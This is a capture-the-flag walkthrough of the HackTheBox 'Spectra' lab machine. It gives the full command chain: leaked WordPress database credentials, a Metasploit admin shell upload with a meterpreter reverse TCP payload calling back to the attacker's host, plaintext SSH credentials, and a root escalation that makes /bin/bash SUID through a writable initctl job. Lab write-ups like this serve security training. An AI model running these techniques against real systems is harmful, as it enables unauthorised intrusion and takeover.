Spectra HackTheBox WalkThrough

This is Spectra HackTheBox machine walkthrough. In this writeup I have demonstrated step-by-step how I rooted to Spectra HTB machine. Before starting let us know something about this machine. It is a Linux OS box (which I came to know after rooting) with IP address 10.10.10.229 and difficulty easy assigned by its maker.

Also, connect your PC with HackTheBox VPN and make sure your connectivity with Spectra machine by pinging its IP 10.10.10.229. If all goes correct then start hacking. As usual, I started by scanning the machine. Used Nmap (port scanner) for this task and the result is below:-

Scanning

$ sudo nmap -sT -sV -p- -O -oA nmap/all-tcp-ports 10.10.10.229

Full TCP scan with Nmap found ports 22, 80 and 3306 as open. OpenSSH Server on port 22, Nginx Web Server on port 80 and MySQL Database Server on port 3306 is running. OpenSSH 8.1 is not affected with any serious vulnerability so I left it for enumeration later when I would get some credentials. Since Web Server is running on port 80 so there should be some website hosted over it and it can be accessed at URL http://10.10.10.229.

After going to this URL found a simple HTML web page and some links namely Software Issue Tracker and Test. Both these links revealed a Virtual Host spectra.htb. So before accessing them let us add spectra.htb to our hosts file. hosts file is present in the directory /etc/.

Host File After Modification

$ cat /etc/hosts

After going to URL http://spectra.htb/main/ found that WordPress is installed in /main folder with its default theme. Then I pressed CTRL+U to check the source-code of this page. After checking the source-code found its version as 5.4.2

A quick google search revealed that this version in not affected with any serious vulnerability that would help us in further enumeration. After going to URL http://spectra.htb/testing/index.php  found another instance of WordPress installed there and there is some database connectivity issue due to which it is not showing home page. But there is directory listing enabled and you can check all its files through the URL http://spectra.htb/testing.

After some initial enumeration got file wp-config.php.save. It contains some credentials. You can only see its content when you see its page-source. Here is the URL of page

view-source:http://spectra.htb/testing/wp-config.php.save

From above extracted credential is

DB_USER: devtest

DB_PASSWORD: devteam01

When I tried to login at http://spectra.htb/main/wp-login.php with creds devtest: devteam01 it says wrong credential. But when I tried to use the credential administrator: devteam01, it logged in successfully. I think this is the reason that database connectivity issue is present at http://spectra.htb/testing/. devtest should be replaced with administrator in above config file for proper connectivity. Anyway, let us get user shell using this creds.

There are multiple ways by which you can get user shell when you get WordPress login credentials. The ways are

1. Upload Shell through Add Theme option.

2. Upload Shell through Add Plugins option.

3. Shell upload into 404.php file of theme.

4. Using pre-installed Plugins into header.php

5. Use metasploit module exploit/unix/webapp/wp_admin_shell_upload to upload and get shell.

I am going to use 5th way that is using metasploit. To get user shell follow the given steps.

Getting User Shell

msf6 > search wp_admin

msf6 > use exploit/unix/webapp/wp_admin_shell_upload

msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PAYLOAD php/meterpreter/reverse_tcp

msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS spectra.htb

msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST 10.10.14.57

msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME administrator

msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD devteam01

msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /main/

msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit

meterpreter > sysinfo

meterpreter > getuid

We have successfully got user shell with user privilege nginx. Let us upgrade it to fully qualified Linux shell so that we can run more advanced Linux command through it.

Upgrading Shell

meterpreter > shell

~export PATH

~export TERM=xterm

~python3 -c 'import pty;pty.spawn("/bin/bash")'

We have successfully upgraded the shell. When I tried to capture user flag from /home/katie/ it gave me access denied permission because user nginx don’t have permission to access user.txt file. We have to find credential of user katie by which we can upgrade this shell to Katie’s privilege shell.

After some enumeration found file autologin.conf.orig in /opt/ directory. This file contains the path of passwd file which contains actual credential. The complete path is /etc/autologin/passwd.

$ cat /opt/autologin.conf.orig

$ cat /etc/autologin/passwd

passwd file has some credential. When I tried to use it with the katie SSH cred it worked. So we have SSH credential of user katie.

katie: SummerHereWeCome!!

Let us login into katie’s account and capture user flag.

Login Into Katie’s Account

$ ssh [email protected]

~SummerHereWeCome!!

$ whoami && id

We have successfully logged in as katie. Let us capture user flag.

Capture User Flag

$ cat user.txt

Privilege Escalation

To escalate privilege to root we have to first find a privilege escalation vector using which we can perform privilege escalation.

Finding PrivEsc Vector

$ sudo -l command revealed that user katie can run $initctl command as root user privilege.

This can be our Potential PrivEsc Vector. When I tried to get root shell by exploiting this excess right given to user katie I could get root shell easily. So here our potential privilege escalation vector is getting root by Sudo Right Exploitation.

Let us understand how it works. So $initctl is a tool that is used to start and stop init daemon (server) or we can say it controls all init daemons running in the system. Check this link for more info. All init daemons’ configuration files are present inside directory /etc/init/. If we can anyhow change any of these configuration files then we can start its init daemon using $initctl command for executing this config file. Since $initctl command is executed by root privilege therefore our code inside this configuration file will also be executed as root and we would get root shell.

So to get root shell I have modified an init daemon configuration file test.conf inside the the directory /etc/init/ since other users can read/write this file. I have replaced content inside script & end script with my shell code.

scriptchmod +s /bin/bashend script

After making changes save the file and start the daemon using $sudo command as given below and follow the below steps. Do this process as soon as possible because content of modified file will be replaced with the previous file content. If all goes correct you will definitely upgrade your shell to root shell.

Getting Root Shell

$ sudo -l

$ ls -la /etc/init | grep test

$ vi /etc/init/test.conf

$ cat /etc/init/test.conf

$ sudo /sbin/initctl start test

$ /bin/bash -p

# whoami && id

We are root now. Let us capture root flag.

Capture Root Flag

# cat /root/root.txt

This was how I rooted Spectra HackTheBox machine. Learnt a lot after this challenge, hope you have also learnt some new things. Thanks for reading this walkthrough. For any query and suggestion related to walkthrough feel free to write us at [email protected].